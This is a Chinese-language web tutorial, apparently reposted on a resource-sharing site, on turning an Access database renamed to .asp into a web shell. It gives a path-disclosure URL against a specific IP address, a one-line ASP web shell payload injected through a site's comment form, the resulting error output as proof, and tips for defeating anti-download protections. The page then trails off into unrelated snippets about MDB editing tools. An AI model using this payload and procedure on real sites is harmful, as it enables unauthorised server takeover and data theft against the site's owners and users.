可能是随着网络安全技术的发展吧,管理员的素质都在提高,在使用access+asp系统时,为不数据库被人下载,到把mdb改为asp或asa。先不说直接改后缀,直接可以用网快等工具直接下载,其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell。
一.思路
大家都知道<%%>为asp文件的标志符,也就是说一个asp文件只会去执行<% %>之间的代码,access+asp的web系统的所有数据都是存放在数据库文件里(mdb文件),由于管理者把mdb文件改为了asp文件,如果我们提交的数据里包含有<%%>,那当我们访问这个asp数据库的时候就会去执行<%%>之间的代码。这样导致我们只提交恶意代码给数据库,那么asp后缀的数据库就是我们的webshell了。
二.示例
随便找个目标,首先我们暴库,看是不是asp后缀的数据库:
http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210
返回:
| Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft JET Database Engine 错误 '80004005'
'D:\log_mdb\%29dlog_mdb%29.asp'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。
/test/conn.asp,行18 |
我们提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的乱码,这样我们可以直接用网际快车等工具直接下载数据库(这里我们不讨论)。我们回到主页看到有提供“网友评论”功能。我们注册个用户,发一条评论:
| < %execute request("b")%> |
这样我们就把asp代码:<%execute request("b")%>写入了数据库,那么数据库:就是我们的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在乱码的最后我们看到:
| /iisHelp/common/500-100.asp,行242
Microsoft VBScript 运行时错误 错误 '800a000d'
类型不匹配: 'execute'
/test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266 |
哈哈,我们的插入的代码运行了。如下图:
注意:我们在向数据库提交代码时,代码内容不可以太大。所以我们采用<%execute request("b")%>。
三.其他一些问题和思路
1.对于改了后缀为asp,还对数据库里加入了<%=’a’-1%>等非法的asp代码来彻底防止下载的数据库,由于里面存在了非法的asp代码,插入我们的webshell代码后运行,将只会显示前面非法代码的错误,而不去执行我们shell的代码。虽然这样可以防止一定的攻击,但还是存在一定的隐患,我们只要在出错的代码前加入兼容错误的代码,就可以得到正确显示执行我们插入的webshell代码了。
2.对于没有改后缀的,也就是mdb文件,这样我们可以先直接下载下来得到后台密码,进了后台,可以利用数据库备用改后缀为asp。
分享到:
相关推荐
可能是随着网络安全技术的发展吧,管理员的素质都在提高,在使用access+asp系统时,为不数据库被人下载,到把mdb改为asp或asa。
- **数据库迁移**:如果需要将mdb文件转换为其他格式,比如SQL Server或MySQL,可以使用数据库迁移工具,如Microsoft SQL Server Import and Export Wizard。 4. **MDBPlus.exe工具** 提到的`MDBPlus.exe`很可能...
MDB数据库修改工具MDB数据库修改工具MDB数据库修改工具MDB数据库修改工具MDB数据库修改工具MDB数据库修改工具
在提供的源码中,"易语言调用对象修改MDB数据库表名源码"应该包含了以上所述的步骤,展示了具体的代码实现。源码分析和学习将帮助你更好地理解易语言如何处理这类问题,以及如何在实际项目中应用这些技术。 需要...
综上所述,"MDB查看修改管理软件"以其全面的功能和用户友好的设计,为处理MDB文件提供了一个强大且便捷的工具。无论是在日常办公、项目开发还是教育领域,都能发挥重要作用,提升工作效率,简化数据库管理工作。
本文将深入探讨易语言如何利用ADOX(ActiveX Data Objects Extensions)Catalog对象来修改MDB(Microsoft Access Database)数据库中的表名。MDB文件是Access数据库的标准格式,常用于存储和管理小型到中型企业级的...
2. 版本兼容性:确保所使用的修改工具与Access数据库的版本兼容,不同版本的MDB文件格式可能有所不同。 3. 许可与合法性:使用第三方工具时,要确保它们是合法的,并遵循软件的许可协议,避免侵犯版权。 4. 技能要求...
而MDB则是Access数据库的文件格式,全称为Microsoft Access Database,通常用于存储和管理数据。 在ASP中使用MDB数据库,通常是通过ADO(ActiveX Data Objects)技术来实现的。ADO提供了一种统一的方式来访问各种...
易语言源码易语言调用对象修改MDB数据库表名源码.rar 易语言源码易语言调用对象修改MDB数据库表名源码.rar 易语言源码易语言调用对象修改MDB数据库表名源码.rar 易语言源码易语言调用对象修改MDB数据库表名源码....
3. 输入数据库的文件名,确保扩展名为.MDB。 4. 选择存储数据库的位置,然后点击“创建”按钮。这将打开一个新的空数据库,你可以开始添加表和其他元素。 当涉及到数据库的安全性时,密码保护是至关重要的。在...
易语言ASP_MDB操作模块源码,ASP_MDB操作模块,ASP_MDB初始化,ASP_MDB查询,ASP_MDB取记录数,ASP_MDB删除,ASP_MDB添加,ASP_MDB修改,ASP_MDB取服务器时间,ASP_MDB查询是否存在,ASP_MDB取中间数据,ASP_MDB时间处理
本篇将详细讲解如何利用C#进行mdb数据库文件的增删改查操作。 mdb文件是Microsoft Access数据库的一种文件格式,通常用于小型数据库应用。在C#中,我们可以使用ADO.NET框架来与mdb数据库进行交互。ADO.NET是.NET ...
标题“lisp读取修改mdb.rar”涉及到的主题是使用LISP语言来操作Microsoft Access的MDB文件,这是一种数据库文件格式。LISP是一种古老而强大的编程语言,以其独特的语法和能力在某些领域,如人工智能和数据库接口,...
本文将深入探讨易语言中的对象操作,特别是如何使用易语言对象来修改MDB(Microsoft Access Database)库的表名。易语言是一款中国本土开发的编程语言,旨在简化编程过程,让编程更加直观易懂。 首先,我们需要了解...
ASP_MDB操作模块 ASP_MDB操作模块 ASP_MDB操作模块
【标题】"网站源码asp+mdb" 指的是使用ASP(Active Server Pages)编程语言和MDB(Microsoft Access数据库)构建的网站源代码。这种组合常见于早期的Web开发中,尤其在小型企业或个人站点中较为流行,因为它们易于...
MDB协议,全称为Media Device Bus(媒体设备总线)协议,是一种用于在多媒体设备之间进行通信的标准。这个协议主要应用于车载信息娱乐系统,允许不同硬件组件如音响、导航系统、蓝牙模块等无缝协作。MDB协议旨在简化...
在"ASP上传图片到MDB并显示"这个场景中,我们要讨论的是如何利用ASP技术将用户上传的图片存储到Microsoft Access(MDB)数据库,并在网页上展示这些图片。 首先,我们需要了解ASP中的文件上传机制。在ASP中,可以...